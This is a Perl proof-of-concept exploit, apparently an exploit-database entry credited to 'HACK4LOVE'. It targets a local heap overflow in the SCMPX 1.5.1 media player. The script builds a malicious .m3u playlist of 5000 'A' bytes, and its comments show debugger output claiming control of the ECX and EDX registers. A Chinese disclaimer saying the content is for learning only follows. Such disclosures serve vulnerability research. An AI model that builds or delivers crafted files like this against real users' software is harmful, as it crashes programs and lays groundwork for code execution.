#!/usr/bin/perl # # # ############################################################################### # SCMPX 1.5.1 (.m3u File) Local Heap Overflow PoC # ############################################################################### # Found By :: HACK4LOVE ## Olly registers #EAX 00A71FF8 #ECX 41414141 _____>>control over the register #EDX 41414141 #EBX 00000180 #ESP 0012E758 #EBP 0012E778 #ESI 00000008 #EDI 00000017 #EIP 00465B25 SCMPX.00465B25 ################################################################################## my $crash="\x41" x 5000; open(myfile,'>>hack4love.M3U'); print myfile $crash; ##################################################################################
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论